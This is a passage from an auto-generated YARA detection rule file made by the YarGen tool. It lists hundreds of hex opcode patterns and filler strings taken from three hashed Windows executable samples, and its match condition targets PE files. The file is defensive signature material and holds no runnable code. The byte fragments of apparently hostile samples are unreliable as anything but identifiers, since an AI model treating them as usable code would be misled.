d4f94200c78424f0 } /* Opcode */ $op662 = { 8945f48d474450ff750ca1a879440068 } /* Opcode */ $op663 = { 8945f48d474450ff750ca1a879440068 } /* Opcode */ $op664 = { ff503c8d44242c894424588d842480 } /* Opcode */ $op665 = { 6cf84200c78424a0 } /* Opcode */ $op666 = { 68385c4300ff7588a1a8794400ff9090 } /* Opcode */ $op667 = { 595985c0745aa1a879440068feff0000 } /* Opcode */ $op668 = { 595985c0745aa1a879440068feff0000 } /* Opcode */ $op669 = { 24184300c78424f0 } /* Opcode */ $op670 = { 59598945bc8b45c0ff70108b45c083c0 } /* Opcode */ $op671 = { 8b45088b50183bca0f82270100008b40 } /* Opcode */ $op672 = { 10f84200c7842488 } /* Opcode */ $op673 = { ff75f4a1a8794400683f420f006864c8 } /* Opcode */ $op674 = { 8d45e450a1a8794400ff90f801000083 } /* Opcode */ $op675 = { 85c00f8420faffff5fff75f0a1a87944 } /* Opcode */ $op676 = { 30694300c78424c0 } /* Opcode */ $op677 = { 8d4300c7842440050000148d4300c784 } /* Opcode */ $op678 = { 6898584300ff75b8a1a8794400ff9090 } /* Opcode */ $op679 = { 8b5dfc3bde75053975f4747b33c03bde } /* Opcode */ $op680 = { 85c075158d45f850ffd68d45f850a1a8 } /* Opcode */ $op681 = { 595985c00f85de07000068e0514300ff } /* Opcode */ $op682 = { 0fb748486685c97e770fbfd13955f07f } /* Opcode */ $op683 = { 595985c00f85210400006858544300ff } /* Opcode */ $op684 = { 595985c00f855208000068b0514300ff } /* Opcode */ $op685 = { a0284300c7842400010000b0284300c7 } /* Opcode */ $op686 = { a4424400c78424d8 } /* Opcode */ $op687 = { 817c2414102700000f8fcc } /* Opcode */ $op688 = { 24ef4200c78424cc } /* Opcode */ $op689 = { 595985c00f85ab010000a1a879440068 } /* Opcode */ $op690 = { a194a04200898194 } /* Opcode */ $op691 = { 8cb34200c78424a0 } /* Opcode */ $op692 = { 8b5d088bf8a1a8794400688049430053 } /* Opcode */ $op693 = { 895c2464895c2468ff900c03000085c0 } /* Opcode */ $op694 = { 895c2464895c2468ff900c03000085c0 } /* Opcode */ $op695 = { ff75108b5d0c8bf8a1a879440053897d } /* Opcode */ $op696 = { 518db884020000ff907c0100005903c0 } /* Opcode */ $op697 = { 54b44200c78424d4 } /* Opcode */ $op698 = { 08284300c78424d8 } /* Opcode */ $op699 = { fbd94000c78110040000cb584100c781 } /* Opcode */ $op700 = { ccb44200c78424fc } /* Opcode */ $op701 = { 595985c0751d6870584300ff75b8a1a8 } /* Opcode */ $op702 = { 595985c00f85cf04000068e0534300ff } /* Opcode */ $op703 = { 578b7d088d45fe508b450cff34b0a1a8 } /* Opcode */ $op704 = { 595985c00f85fc010000a1a879440068 } /* Opcode */ $op705 = { 8944246c8b44244483c04450ff742450 } /* Opcode */ $op706 = { 595985c00f8583020000ff75e0a1a879 } /* Opcode */ $op707 = { 59598d44240850a1a8794400ff90a402 } /* Opcode */ $op708 = { 85c0753aa1a87944006a01683c3d4400 } /* Opcode */ $op709 = { 74b44200c78424dc } /* Opcode */ $op710 = { a8b34200c78424a4 } /* Opcode */ $op711 = { a1e0a04200898128040000a144a04200 } /* Opcode */ $op712 = { 60b44200c78424d8 } /* Opcode */ $op713 = { f4674300c784248c } /* Opcode */ $op714 = { 59598945d08d45d85068ff8f0000ff75 } /* Opcode */ $op715 = { 6814e34300ff75f88945cca1a8794400 } /* Opcode */ $op716 = { a1a879440083c450ff74240c681c6643 } /* Opcode */ $op717 = { 78f84200c78424a4 } /* Opcode */ $op718 = { 9c3c4400c7842400010000a83c4400c7 } /* Opcode */ $op719 = { 9c4300c784248c0900000c9c4300c784 } /* Opcode */ $op720 = { b4174300c78424cc } /* Opcode */ $op721 = { 6c3c4400c78424f0 } /* Opcode */ $op722 = { 894da4ff503c8d45dc8945bc8d459c50 } /* Opcode */ $op723 = { 78ef4200c78424e0 } /* Opcode */ $op724 = { 54b34200c7842494 } /* Opcode */ $op725 = { 8365fc0059598945f88b45fc8b9c8590 } /* Opcode */ $op726 = { 90284300c78424fc } /* Opcode */ $op727 = { c4684300c78424b0 } /* Opcode */ $op728 = { bcad4300c784248c } /* Opcode */ $op729 = { 0fb70db879440053516824e343005689 } /* Opcode */ $op730 = { 24b34200c784248c } /* Opcode */ $op731 = { 534c4100c781a8020000dd284100c781 } /* Opcode */ $op732 = { ff75f8a1a87944005768b4c0430068cc } /* Opcode */ $op733 = { 833dcc79440000750ac705cc7944009c } /* Opcode */ $op734 = { 344400c78424ec02000010344400c784 } /* Opcode */ $op735 = { 85c0753cff742424a1a879440068a82c } /* Opcode */ $op736 = { 1cb44200c78424c0 } /* Opcode */ $op737 = { 8d45e050ff75f4a1a8794400ff905402 } /* Opcode */ $op738 = { c43b4400c78424b8 } /* Opcode */ $op739 = { 595985c00f856506000068e0524300ff } /* Opcode */ $op740 = { ff76088bf88d460c50a1a879440057ff } /* Opcode */ $op741 = { 50a1a8794400ff500c84c0a1a8794400 } /* Opcode */ $op742 = { 595985c0754f68b05c4300ff7588a1a8 } /* Opcode */ $op743 = { 836508008365f8005959668b4e026649 } /* Opcode */ $op744 = { 8bf033c0668945dc8d7ddeab6a08ff75 } /* Opcode */ $op745 = { 904300c78424100600000c904300c784 } /* Opcode */ $op746 = { 595985c00f858206000068c8524300ff } /* Opcode */ $op747 = { 595985c07564a1a87944006858de4300 } /* Opcode */ $op748 = { 59598945e88365cc008365e40068feff } /* Opcode */ $op749 = { 85c074148d45d050a1a8794400ff90a4 } /* Opcode */ $op750 = { a1a8794400566800100000ff7508ff90 } /* Opcode */ $op751 = { 595985c00f85a8020000683c594300ff } /* Opcode */ $op752 = { 515350a1a879440057ff90bc0100008b } /* Opcode */ $op753 = { 374400c78424ac03000010374400c784 } /* Opcode */ $op754 = { 895ddc895de0ff90bc02000085c00f85 } /* Opcode */ $op755 = { 895ddc895de0ff90bc02000085c00f85 } /* Opcode */ $op756 = { 68b8094400ff75fcff91600100008b0d } /* Opcode */ $op757 = { 595985c0753668ec5b4300ff7588a1a8 } /* Opcode */ $op758 = { ff90840100005f85c0740432c0c9c38b } /* Opcode */ $op759 = { 84b44200c78424e4 } /* Opcode */ $op760 = { 595985c00f8578040000681c544300ff } /* Opcode */ $op761 = { 595985c00f85d9060000687c524300ff } /* Opcode */ $op762 = { a8ad4300c7842484 } /* Opcode */ $op763 = { 93364000c781640100006e984100a178 } /* Opcode */ $op764 = { 78284300c78424f8 } /* Opcode */ $op765 = { 8d8500feffff686c80430068ff } /* Opcode */ $op766 = { a1a879440083c44056ff90e4030000a1 } /* Opcode */ $op767 = { 83c41c894424146a01e99b0300008b44 } /* Opcode */ $op768 = { 2e4300c7842470020000102e4300c784 } /* Opcode */ $op769 = { a16ca04200c7411c1f4c41008981f8 } /* Opcode */ $op770 = { f0174300c78424dc } /* Opcode */ $op771 = { bc274300c78424c4 } /* Opcode */ $op772 = { 59598b45c0050010000050a1a8794400 } /* Opcode */ $op773 = { 595985c00f854c01000068f8564300ff } /* Opcode */ $op774 = { 8d44242450ff74241ca1a8794400ff90 } /* Opcode */ $op775 = { ff742434a1a879440068ac65430068bc } /* Opcode */ $op776 = { 964300c78424cc0700000c964300c784 } /* Opcode */ $op777 = { 33f6803d9379440000751aa1a8794400 } /* Opcode */ $op778 = { 595985c00f85fa0100006830564300ff } /* Opcode */ $op779 = { 8bf0a1a879440083c4108975fc85f675 } /* Opcode */ $op780 = { a1a8794400686ce5430053ff9090 } /* Opcode */ $op781 = { 59598d4de4515650538945f8895dfc53 } /* Opcode */ $op782 = { acae4300c78424cc } /* Opcode */ $op783 = { 48ee4200c7842490 } /* Opcode */ $op784 = { 0faf459c8d7008a1a879440056ff750c } /* Opcode */ $op785 = { 0cf94200c78424c4 } /* Opcode */ $op786 = { 894424188d474450ff750ca1a8794400 } /* Opcode */ $op787 = { 8b7d0ceb2550a1a8794400ff90e8 } /* Opcode */ $op788 = { 85c00f85e905000057bffeff0000eb02 } /* Opcode */ $op789 = { 595989463a85c074bc33ff8b46282bc7 } /* Opcode */ $op790 = { 8bf08b450c6683385c59598975f87516 } /* Opcode */ $op791 = { 8bf08b450c6683385c59598975f87516 } /* Opcode */ $op792 = { 595985c00f857d0500006870534300ff } /* Opcode */ $op793 = { 895de0895de4ff90bc0200008bf881ff } /* Opcode */ $op794 = { bc6a4300c7842400010000cc6a4300c7 } /* Opcode */ $op795 = { 84684300c78424a4 } /* Opcode */ $op796 = { 85c00f84b4feffffff75f8a1a8794400 } /* Opcode */ $op797 = { a1a87944006820de430053ff9090 } /* Opcode */ $op798 = { e0ad4300c7842494 } /* Opcode */ $op799 = { dcce4000c78130010000bd184000c781 } /* Opcode */ $op800 = { 595985c00f854d020000ff75d8a1a879 } /* Opcode */ $op801 = { 595985c00f85ca0300006880544300ff } /* Opcode */ $op802 = { 5933db5989442410895c2414be80 } /* Opcode */ $op803 = { 50a1a879440057689cc8430068acc843 } /* Opcode */ $op804 = { ff75fca1a8794400576848c74300685c } /* Opcode */ $op805 = { a1a879440068d45e440057ff90f40300 } /* Opcode */ $op806 = { a1a879440056ff9080020000a1a87944 } /* Opcode */ $op807 = { ff7424148bf0a1a879440056ff906003 } /* Opcode */ $op808 = { a1a879440083c4485753ff902c010000 } /* Opcode */ $op809 = { ff742420a1a8794400686866430053ff } /* Opcode */ $op810 = { fcb24200c7842484 } /* Opcode */ $op811 = { 834f28ff8367240059595e5b5fc9c355 } /* Opcode */ $op812 = { 64ae4300c78424bc } /* Opcode */ $op813 = { 50a1a8794400ff901c01000083c418a1 } /* Opcode */ $op814 = { ff75108bf8ff750ca1a879440068185f } /* Opcode */ $op815 = { 595985c00f8537010000a1a879440068 } /* Opcode */ $op816 = { e4264300c7842488 } /* Opcode */ $op817 = { ff45fc817dfc102700000f8ffe } /* Opcode */ $op818 = { 595985c00f85a802000068a4554300ff } /* Opcode */ $op819 = { a1a8794400683440430057ff90400100 } /* Opcode */ $op820 = { 595985c00f856e02000068d8554300ff } /* Opcode */ $op821 = { 568bf8a1a87944006a0057ff90780100 } /* Opcode */ $op822 = { a1a879440068f0464300ff7508ff902c } /* Opcode */ $op823 = { 595985c00f85c107000068f0514300ff } /* Opcode */ $op824 = { 85c00f8444ffffff32dbeb02b301a1a8 } /* Opcode */ $op825 = { 4c3b4400c7842484 } /* Opcode */ $op826 = { 8bf8a1a87944005653897dfcff90b8 } /* Opcode */ $op827 = { 0cef4200c78424c4 } /* Opcode */ $op828 = { 8cb44200c78424e8 } /* Opcode */ $op829 = { 59598d4c244c51575056894424248974 } /* Opcode */ $op830 = { a0684300c78424a8 } /* Opcode */ $op831 = { 10174300c78424a4 } /* Opcode */ $op832 = { a1a879440068fc5e440057ff90f40300 } /* Opcode */ $op833 = { ff742440a1a8794400680c634300681c } /* Opcode */ $op834 = { ff75f0a1a87944005368d0c8430068e0 } /* Opcode */ $op835 = { 8b46048b0d9c7944008988b4 } /* Opcode */ $op836 = { f8ad4300c784249c } /* Opcode */ $op837 = { 87194000c741487b614000c781b80300 } /* Opcode */ $op838 = { 50ae4300c78424b4 } /* Opcode */ $op839 = { 18af4300c78424f0 } /* Opcode */ $op840 = { ff75f8a1a87944005356ff5014ff75f8 } /* Opcode */ $op841 = { a8f84200c78424b0 } /* Opcode */ $op842 = { 8d45fc50a1a8794400ff90f801000083 } /* Opcode */ $op843 = { 8d45fc50a1a8794400ff90f801000083 } /* Opcode */ $op844 = { 595985c00f854806000068f0524300ff } /* Opcode */ $op845 = { a1a8794400685440430057ff90400100 } /* Opcode */ $op846 = { bbd03f00003bf36a010f8e9f } /* Opcode */ $op847 = { 85c07549a1a879440053ff74241868d8 } /* Opcode */ $op848 = { 68cc574300ff75b8a1a8794400ff9090 } /* Opcode */ $op849 = { 85c0754fa1a87944006a01ff74241c68 } /* Opcode */ $op850 = { 9c3b4400c78424a8 } /* Opcode */ $op851 = { ff742448a1a879440068e065430068e8 } /* Opcode */ $op852 = { 5cf84200c784249c } /* Opcode */ $op853 = { 6800080000ff75088945f0a1a8794400 } /* Opcode */ $op854 = { 595985c00f85a3010000684c5a4300ff } /* Opcode */ $op855 = { 88274300c78424b4 } /* Opcode */ $op856 = { 24f84200c7842490 } /* Opcode */ $op857 = { 85c00f84ddfeffffa1a87944005753ff } /* Opcode */ $op858 = { 8b55f80fb6120fb63f8b450803d75981 } /* Opcode */ $op859 = { 558beca1a879440083ec14538b5d0856 } /* Opcode */ $op860 = { 24174300c78424a8 } /* Opcode */ $op861 = { 8b75108b363bf30f8d92 } /* Opcode */ $op862 = { 595985c00f852b0600006800534300ff } /* Opcode */ $op863 = { 59598bf0a1a87944005668ff7f0000ff } /* Opcode */ $op864 = { ec3b4400c78424c8 } /* Opcode */ $op865 = { 689842430050a1a879440057ff905001 } /* Opcode */ $op866 = { c4694300c78424dc } /* Opcode */ $op867 = { 83c43885c00f85bb020000a1a8794400 } /* Opcode */ $op868 = { 18f84200c784248c } /* Opcode */ $op869 = { 0cb34200c7842488 } /* Opcode */ $op870 = { 6818494300ff75088bf8a1a8794400ff } /* Opcode */ $op871 = { e4b34200c78424b0 } /* Opcode */ $op872 = { ff7604a1a8794400ff75fc5368145d44 } /* Opcode */ $op873 = { 85c074148d45f450a1a8794400ff90a4 } /* Opcode */ $op874 = { 668bd80fb70750a1a8794400ff90e8 } /* Opcode */ $op875 = { 668bd80fb70750a1a8794400ff90e8 } /* Opcode */ $op876 = { 83c410ff45fc8b45fc3b45f87caf5ba1 } /* Opcode */ $op877 = { 6683780a3a0f85b6 } /* Opcode */ $op878 = { 8bf8a1a879440083c41857c7071c0100 } /* Opcode */ $op879 = { b8f84200c78424b4 } /* Opcode */ $op880 = { 8944241833c066894424308d7c2432ab } /* Opcode */ $op881 = { a1a8794400ff742434681080430056ff } /* Opcode */ $op882 = { ff75fca1a8794400536888c743006898 } /* Opcode */ $op883 = { a1a879440056ff9008020000a1a87944 } /* Opcode */ $op884 = { 837d0c02598bf0598975f8750dff35c0 } /* Opcode */ $op885 = { 10fa4200c784240001000024fa4200c7 } /* Opcode */ $op886 = { 576800654400682865440056ff903c03 } /* Opcode */ $op887 = { 8975e88975ecff90f8 } /* Opcode */ $op888 = { 595985c00f8560050000687c534300ff } /* Opcode */ $op889 = { 595985c00f852f0100006820574300ff } /* Opcode */ $op890 = { 57ff75088945d8a1a8794400ff90b8 } /* Opcode */ $op891 = { 59598945f88b45fcff308b45fc83c004 } /* Opcode */ $op892 = { 59598945f88b45fcff308b45fc83c004 } /* Opcode */ $op893 = { 5733ff397d7c0f84f5010000a1a87944 } /* Opcode */ $op894 = { 681c5b4300ff7588a1a8794400ff9090 } /* Opcode */ $op895 = { 8b55148b1285d20f8c1f0100000fbf70 } /* Opcode */ $op896 = { 8946048b442418893083c40c8bc65ec3 } /* Opcode */ $op897 = { 595985c075368b45a44050ff7590ff75 } /* Opcode */ $op898 = { 344300c784243404000010344300c784 } /* Opcode */ $op899 = { 04694300c78424bc } /* Opcode */ $op900 = { 595985c00f851702000068f4594300ff } /* Opcode */ $op901 = { 836004008320005959c3558beca1a879 } /* Opcode */ $op902 = { 68c07344008945f0578d45f050a1a879 } /* Opcode */ $op903 = { 8b75fca1a87944006a0056ff506483c4 } /* Opcode */ $op904 = { 11654000c74164e7744000c741241a74 } /* Opcode */ $op905 = { 59593bc37478a1a879440068c0e54300 } /* Opcode */ $op906 = { 595985c00f85c8010000a1a879440068 } /* Opcode */ $op907 = { 68745c4300ff7588a1a8794400ff9090 } /* Opcode */ $op908 = { 595985c00f856f08000068a4514300ff } /* Opcode */ $op909 = { 595985c00f8517020000681c564300ff } /* Opcode */ $op910 = { ff35c87944008bf8a1a8794400688477 } /* Opcode */ $op911 = { a0274300c78424bc } /* Opcode */ $op912 = { 44174300c78424b0 } /* Opcode */ $op913 = { 98174300c78424c0 } /* Opcode */ $op914 = { 686c5b4300ff7588a1a8794400ff9090 } /* Opcode */ $op915 = { 687c584300ff75b8a1a8794400ff9090 } /* Opcode */ $op916 = { ff4424108d474450a1a8794400ff9098 } /* Opcode */ $op917 = { ec164300c78424a0 } /* Opcode */ $op918 = { 4c434400c78424ec } /* Opcode */ $op919 = { 8b75108b363bf20f8dd5 } /* Opcode */ $op920 = { 6834484300ff75088bf8a1a8794400ff } /* Opcode */ $op921 = { 85c0753cff74242ca1a8794400683038 } /* Opcode */ $op922 = { 1d4300c78424e00100000c1d4300c784 } /* Opcode */ $op923 = { a1a87944006860e5430053ff9090 } /* Opcode */ $op924 = { f8684300c78424b8 } /* Opcode */ $op925 = { 595981ffd03f00008945f889380f8eb0 } /* Opcode */ $op926 = { fcf74200c7842484 } /* Opcode */ $op927 = { fec3660fb6c35959663b450c750232db } /* Opcode */ $op928 = { 836424200089442428a100b042005959 } /* Opcode */ $op929 = { 50a1a87944005668d06643005653ff90 } /* Opcode */ $op930 = { 8b45f40145f02945ec83c40cff45fc8b } /* Opcode */ $op931 = { 83c42c85c00f852e030000ff75100fb7 } /* Opcode */ $op932 = { 6c694300c78424d0 } /* Opcode */ $op933 = { 595985c00f857303000068d8544300ff } /* Opcode */ $op934 = { 9cf84200c78424ac } /* Opcode */ $op935 = { a8164300c7842494 } /* Opcode */ $op936 = { ff45fc817dfce80300000f8fac } /* Opcode */ $op937 = { e9adfeffffa1a87944006a006affff90 } /* Opcode */ $op938 = { 33c0668944242c8d7c242eab66ab6810 } /* Opcode */ $op939 = { fc414400c78424c0 } /* Opcode */ $op940 = { a1a879440083c450ff75f85768e8c043 } /* Opcode */ $op941 = { 59881daf794400ff0500b04200381daf } /* Opcode */ $op942 = { d4ee4200c78424b0 } /* Opcode */ $op943 = { 203c4400c78424d8 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 900KB and ( 5 of ($s*) )and 1 of ($op*) ) or ( all of them ) } rule _370c433dd61ec21d2677cfe02ef93a5f32a2b50d_5bf48d77bade79f2421ae3d258fe8262c043fb8f_08bdf374b28b234e824797145206f4df79eac6ea_1 { meta: description = "Auto-generated rule - from files 370c433dd61ec21d2677cfe02ef93a5f32a2b50d.codex, 5bf48d77bade79f2421ae3d258fe8262c043fb8f.codex, 08bdf374b28b234e824797145206f4df79eac6ea.codex" author = "YarGen Rule Generator" reference = "not set" date = "2016-07-21" super_rule = 1 hash1 = "29b4498ac81d654b52cd0a32bdf29ed955f046ef9db1e0eba7da47ab2f950a3e" hash2 = "84ab50a9e325f64a54d84fb6798d8e74f46c21fd8b935d6c47a44bb140effad9" hash3 = "3f326fb6a79842c657efa09b71ce5e46dc110dd324bfabfcd32730d86de0bcf5" strings: $s1 = ":$:+:2:9:@:G:N:U:\\:s:" fullword ascii $s2 = "6%6+606<6H6M6\\6b6g6v6}6" fullword ascii $s3 = "8\"8,818;8@8J8O8Y8^8h8m8w8" fullword ascii $s4 = "6 6'6.656<6C6J6Q6X6_6f6m6t6" fullword ascii $s5 = "4\"4)40474>4E4L4S4Z4a4h4" fullword ascii $s6 = "9\"9+91969?9E9J9S9\\9a9j9p9u9~9" fullword ascii $s7 = "9\"9'91999C9H9R9W9a9f9p9u9" fullword ascii $s8 = "4\"4(4-4<4B4G4S4_4d4s4y4~4" fullword ascii $s9 = "6\"6'6,6=6B6G6X6]6b6o6{6" fullword ascii $s10 = "?\"?/?4?B?G?L?Y?^?k?p?}?" fullword ascii $s11 = "3)31383>3C3L3R3W3c3i3n3w3}3" fullword ascii $s12 = ";&;+;5;:;D;I;S;X;b;j;t;y;" fullword ascii $s13 = "='=,=6=>=H=M=W=\\=a=m=r=w=" fullword ascii $s14 = ":!:*:/:9:>:H:P:Z:_:i:n:x:}:" fullword ascii $s15 = "3$3.383B3L3S3Z3a3h3o3v3}3" fullword ascii $s16 = "<$<.<3<=<B<L<Q<^<c<m<r<|<" fullword ascii $s17 = "31383?3F3M3T3[3b3i3p3w3~3" fullword ascii $s18 = "?*?1?8???F?M?T?[?b?i?p?w?" fullword ascii $s19 = "9!9(9/969=9D9K9R9Y9`9g9n9x9" fullword ascii $s20 = ":$:*:/:8:>:C:L:U:Z:c:i:n:w:|:" fullword ascii $op0 = { fc014300c78424f0 } /* Opcode */ $op1 = { a1d860440068d0cd430053ff90200300 } /* Opcode */ $op2 = { c7819c0300000ca64000c78124030000 } /* Opcode */ $op3 = { 59395df8759d8d45fc505353538d45a8 } /* Opcode */ $op4 = { 663bd875438bc62b450c8945fceb038b } /* Opcode */ $op5 = { 895de4895de8ff901404000085c07d07 } /* Opcode */ $op6 = { c82a4400c78424c8 } /* Opcode */ $op7 = { 6c514300c7842498 } /* Opcode */ $op8 = { d8014300c78424e0 } /* Opcode */ $op9 = { 84a44200c78424e4 } /* Opcode */ $op10 = { 59598b460485c0741250ff74240ca1d8 } /* Opcode */ $op11 = { 33db83c4203bfb0f84a0 } /* Opcode */ $op12 = { 83c4188945fc837dfc000f848f } /* Opcode */ $op13 = { 74294400c784249c } /* Opcode */ $op14 = { 04024300c78424f4 } /* Opcode */ $op15 = { 50974300c78424d0 } /* Opcode */ $op16 = { 68feff0000ff7508ff90040200008945 } /* Opcode */ $op17 = { 59ff75eca1d8604400680cb1430056ff } /* Opcode */ $op18 = { 59385d0c0f844e010000535357575756 } /* Opcode */ $op19 = { ecdd4200c78424d4 } /* Opcode */ $op20 = { a1d86044008d5f106894c6430053ff90 } /* Opcode */ $op21 = { bf300e440057894df0ff904002000059 } /* Opcode */ $op22 = { 24244400c78424ac } /* Opcode */ $op23 = { ff90a80300003d220000c00f8586 } /* Opcode */ $op24 = { a1d860440057ff7508ff909001000033 } /* Opcode */ $op25 = { 598d45b450a1d8604400ff90e0030000 } /* Opcode */ $op26 = { a1d86044005653ff742424ff90d40300 } /* Opcode */ $op27 = { 0cdd4200c7842498 } /* Opcode */ $op28 = { 8975ec8975f0ff90a8030000f7d81bc0 } /* Opcode */ $op29 = { 88114300c78424c4 } /* Opcode */ $op30 = { 18244400c78424a4 } /* Opcode */ $op31 = { 3cdd4200c78424a0 } /* Opcode */ $op32 = { 83c40c894590ff75a4ff75ac8b4590ff } /* Opcode */ $op33 = { a1d86044006a0068f0c84300ff7508ff } /* Opcode */ $op34 = { 6c124300c78424000100007c124300c7 } /* Opcode */ $op35 = { 3935046144000f85c6 } /* Opcode */ $op36 = { 59a1d8604400566a00ff75f0ff90d403 } /* Opcode */ $op37 = { 542b4400c78424dc } /* Opcode */ $op38 = { a0294400c78424a4 } /* Opcode */ $op39 = { 83c4188945fc837dfc000f8404010000 } /* Opcode */ $op40 = { 8d45e050ff75f4a1d8604400ff90d8 } /* Opcode */ $op41 = { 598d44000250ff751433db43536a008d } /* Opcode */ $op42 = { 58dd4200c78424a8 } /* Opcode */ $op43 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op44 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op45 = { 53ff76088bf8a1d8604400ff90dc } /* Opcode */ $op46 = { 54114300c78424b4 } /* Opcode */ $op47 = { 83c420803de2604400007430ff74241c } /* Opcode */ $op48 = { ff7604a1d8604400ff75fc5368b04444 } /* Opcode */ $op49 = { 59a1d8604400566a0053ff90d4030000 } /* Opcode */ $op50 = { 3d230000c0740b3d050000800f85c7 } /* Opcode */ $op51 = { a1d86044008b80d402000083c40c3bc3 } /* Opcode */ $op52 = { 83c40c5f5e5b8be55dc3558bec83ec28 } /* Opcode */ $op53 = { 68fc404300ff75b8a1d8604400ff9020 } /* Opcode */ $op54 = { 8d4744688c4a430050a1d8604400ff90 } /* Opcode */ $op55 = { 50a1d86044005668604d43005653ff90 } /* Opcode */ $op56 = { 5932c0eb628a451057ff750c88068d46 } /* Opcode */ $op57 = { 44e84200c78424d8 } /* Opcode */ $op58 = { 50e74200c78424a8 } /* Opcode */ $op59 = { e0244400c78424ec } /* Opcode */ $op60 = { a1d860440068a0c6430053ff90200300 } /* Opcode */ $op61 = { e0524300c78424d8 } /* Opcode */ $op62 = { 895e10895e14ff901404000085c0742a } /* Opcode */ $op63 = { 83c40c68fc6943008d45c050a1d86044 } /* Opcode */ $op64 = { 83c40c5e5f5bc9c3558bec8b4d088a01 } /* Opcode */ $op65 = { 54a34200c7842494 } /* Opcode */ $op66 = { 8b7c2410a1d860440083c744c70424c8 } /* Opcode */ $op67 = { 595f5e5bc9c3558bec83ec0ca1d86044 } /* Opcode */ $op68 = { e0114300c78424dc } /* Opcode */ $op69 = { 595984c00f85e80b0000a1d860440056 } /* Opcode */ $op70 = { 9c964300c78424a4 } /* Opcode */ $op71 = { c4004300c78424a0 } /* Opcode */ $op72 = { 4003c050ff742414a1d8604400ff9004 } /* Opcode */ $op73 = { 02724100c78110040000fd234100c781 } /* Opcode */ $op74 = { 83c40c8b45fc8b4df489086881 } /* Opcode */ $op75 = { 598d45f450a1d8604400ff90b8030000 } /* Opcode */ $op76 = { 1a9f4100c781fc03000021224100c781 } /* Opcode */ $op77 = { 83c410eb0233c05b5f5e5dc3558bec83 } /* Opcode */ $op78 = { f0e74200c78424cc } /* Opcode */ $op79 = { 6a085933c0897dcc8d7dd0f3ab8d45f4 } /* Opcode */ $op80 = { 83c4208d44241850a1d8604400ff90b8 } /* Opcode */ $op81 = { 598d44000250536a01568d45ec50ff75 } /* Opcode */ $op82 = { 598d44000250536a01568d45ec50ff75 } /* Opcode */ $op83 = { 83c42ca1d860440057689ca9430068c0 } /* Opcode */ $op84 = { 595f5ec9c3a1d86044006a00ff74240c } /* Opcode */ $op85 = { 59a1d860440056ff90dc020000a1d860 } /* Opcode */ $op86 = { 942b4400c78424e4 } /* Opcode */ $op87 = { ff37a1d8604400ff9098 } /* Opcode */ $op88 = { ff37a1d8604400ff9098 } /* Opcode */ $op89 = { 34124300c78424f4 } /* Opcode */ $op90 = { bca44200c78424f8 } /* Opcode */ $op91 = { a1d860440057ff9098 } /* Opcode */ $op92 = { 85c075078b45cc488945ccff75bcff75 } /* Opcode */ $op93 = { a1d860440068e0cd430053ff90200300 } /* Opcode */ $op94 = { 70e84200c78424e4 } /* Opcode */ $op95 = { 60964300c7842490 } /* Opcode */ $op96 = { d8234400c7842488 } /* Opcode */ $op97 = { 83c40c6844424300ff7588a1d8604400 } /* Opcode */ $op98 = { 83c40c8d45dc50568d45fc50a1d86044 } /* Opcode */ $op99 = { 8d45dc5068000108008d45fc50a1d860 } /* Opcode */ $op100 = { 83c4148945f4ff75f0ff7508a1d86044 } /* Opcode */ $op101 = { 30514300c7842490 } /* Opcode */ $op102 = { ff75fca1d860440056ff90e4030000ff } /* Opcode */ $op103 = { 895c245c895c2460ff90a803000085c0 } /* Opcode */ $op104 = { 1c254400c784240001000028254400c7 } /* Opcode */ $op105 = { 59a1d8604400566a0057ff90d4030000 } /* Opcode */ $op106 = { 7b4300c78424a8060000107b4300c784 } /* Opcode */ $op107 = { 8b4dfc8b0481050410000050a1d86044 } /* Opcode */ $op108 = { 81f9d03f00000f8e96 } /* Opcode */ $op109 = { a1d8604400680446440057ff50405959 } /* Opcode */ $op110 = { e934feffff558bec83ec746a1d8d458c } /* Opcode */ $op111 = { 88974300c78424e4 } /* Opcode */ $op112 = { 102a4400c78424b0 } /* Opcode */ $op113 = { 10514300c7842488 } /* Opcode */ $op114 = { 83c40c5f5e5b8be55dc3558bec83ec14 } /* Opcode */ $op115 = { b4dd4200c78424c4 } /* Opcode */ $op116 = { 20974300c78424c4 } /* Opcode */ $op117 = { 8b50245685d20f8ee2 } /* Opcode */ $op118 = { 8ca44200c78424e8 } /* Opcode */ $op119 = { e0284400c7842488 } /* Opcode */ $op120 = { f61c4000c7412cbb584100c781100300 } /* Opcode */ $op121 = { 08114300c78424a0 } /* Opcode */ $op122 = { 83c40c5b5f5ec9c3558bec83ec348365 } /* Opcode */ $op123 = { fca24200c7842484 } /* Opcode */ $op124 = { 4c534300c78424e4 } /* Opcode */ $op125 = { c605c160440001892dcc6044008925c8 } /* Opcode */ $op126 = { c605c160440001892dcc6044008925c8 } /* Opcode */ $op127 = { a0244400c78424d8 } /* Opcode */ $op128 = { e95ffeffffa1d860440053576864a042 } /* Opcode */ $op129 = { 4ca54000c741143c574100c7819c0200 } /* Opcode */ $op130 = { 814300c78424780800000c814300c784 } /* Opcode */ $op131 = { c0964300c78424ac } /* Opcode */ $op132 = { 44244400c78424b8 } /* Opcode */ $op133 = { ff742410a1d860440053ff9090010000 } /* Opcode */ $op134 = { ff742410a1d860440053ff9090010000 } /* Opcode */ $op135 = { 44114300c78424b0 } /* Opcode */ $op136 = { f0234400c7842490 } /* Opcode */ $op137 = { 18114300c78424a4 } /* Opcode */ $op138 = { 744300c78424c004000014744300c784 } /* Opcode */ $op139 = { 83c4188945fc837dfc00752a6880 } /* Opcode */ $op140 = { ccdd4200c78424cc } /* Opcode */ $op141 = { 595b5f5ec9c3558bec535633f633db33 } /* Opcode */ $op142 = { b0de4200c78424fc } /* Opcode */ $op143 = { fc114300c78424e4 } /* Opcode */ $op144 = { fc104300c784249c } /* Opcode */ $op145 = { 8c744000c74108501e4100c781e0 } /* Opcode */ $op146 = { a1d8604400895dfcff50108945f8a1d8 } /* Opcode */ $op147 = { 2c534300c78424e0 } /* Opcode */ $op148 = { 88524300c78424cc } /* Opcode */ $op149 = { b0284400c7842484 } /* Opcode */ $op150 = { 83c41089450885c0751b3945fc0f845d } /* Opcode */ $op151 = { f4524300c78424dc } /* Opcode */ $op152 = { 50de4200c78424ec } /* Opcode */ $op153 = { 094300c784247002000014094300c784 } /* Opcode */ $op154 = { 8b4e2485c90f84e6 } /* Opcode */ $op155 = { 14254400c78424fc } /* Opcode */ $op156 = { d8104300c7842490 } /* Opcode */ $op157 = { 895c2464895c2468ff90a803000085c0 } /* Opcode */ $op158 = { 895c2464895c2468ff90a803000085c0 } /* Opcode */ $op159 = { 